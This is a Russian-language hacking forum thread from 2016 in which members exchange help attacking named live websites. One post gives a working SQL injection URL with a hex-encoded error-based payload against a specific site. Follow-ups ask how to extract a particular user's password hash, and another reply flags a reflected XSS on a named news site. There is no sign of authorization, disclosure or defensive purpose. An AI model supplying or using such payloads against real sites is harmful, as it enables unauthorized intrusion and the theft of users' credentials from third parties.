HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #961  
Старый 02.01.2016, 12:12
segodnya
Guest
Сообщений: n/a
Провел на форуме:
2724

Репутация: 0
По умолчанию

Цитата:
Сообщение от kingbeef  
kingbeef said:

Используй ExtractValue . Все работает.
Пробую, не получается ничего вывести

если можно в ЛС пожалуйста
 
Ответить с цитированием

  #962  
Старый 02.01.2016, 13:38
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
Сообщение от segodnya  
segodnya said:

Пробую, не получается ничего вывести
если можно в ЛС пожалуйста
там скуля в insert и усе легко крутится, ответили же

Код:
Code:
https://lk.ourmission.space/?ref=-393' and 0 /*!union*/ select 0x27262873656C656374202A2066726F6D2873656C656374206E616D655F636F6E73742876657273696F6E28292C31292C6E616D655F636F6E73742876657273696F6E28292C31292961292627-- -
 
Ответить с цитированием

  #963  
Старый 02.01.2016, 13:54
segodnya
Guest
Сообщений: n/a
Провел на форуме:
2724

Репутация: 0
По умолчанию

Цитата:
Сообщение от Strilo4ka  
Strilo4ka said:

там скуля в insert и усе легко крутится, ответили же
Код:
Code:
https://lk.ourmission.space/?ref=-393' and 0 /*!union*/ select 0x27262873656C656374202A2066726F6D2873656C656374206E616D655F636F6E73742876657273696F6E28292C31292C6E616D655F636F6E73742876657273696F6E28292C31292961292627-- -
спасибо, но не могу получить md5 пароль, определенного пользователя каким запросом это осуществить!
 
Ответить с цитированием

  #964  
Старый 02.01.2016, 14:05
Legionanonymous
Guest
Сообщений: n/a
Провел на форуме:
2626

Репутация: 0
По умолчанию

Киньте мануальчик или посдкажите как взломать сайт если на нём нету ?id= и т.д а в таком виде страницы http://www.site.com/game/The_Elder_S...riel_Unlimited или в Html на конце.
 
Ответить с цитированием

  #965  
Старый 02.01.2016, 14:21
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Парни, подскажите как в бурп сюте сохранить карту сайта для передаче sqlmapу. Может не карта сайта называется... что бы не краулить сайт по новой. Спасибо
 
Ответить с цитированием

  #966  
Старый 02.01.2016, 17:28
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от segodnya  
segodnya said:

спасибо, но не могу получить md5 пароль, определенного пользователя
каким запросом это осуществить!
С помощью where
 
Ответить с цитированием

  #967  
Старый 03.01.2016, 07:50
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

http://www.maltatoday.com.mt/ui_fron.../300/175/?url= можно что-то придумать?
 
Ответить с цитированием

  #968  
Старый 03.01.2016, 18:10
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

http://www.maltatoday.com.mt/ui_fron.../300/175/?url=
можно что-то придумать?
придумать что? что вас смущает?
 
Ответить с цитированием

  #969  
Старый 03.01.2016, 19:08
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:

придумать что? что вас смущает?
не получается заюзать.
 
Ответить с цитированием

  #970  
Старый 03.01.2016, 19:10
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

не получается заюзать.
что именно заюзать? вы видите там уязвимость?

по соседству есть Reflected XSS

Код:
Code:
http://www.maltatoday.com.mt/ui_frontend/
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ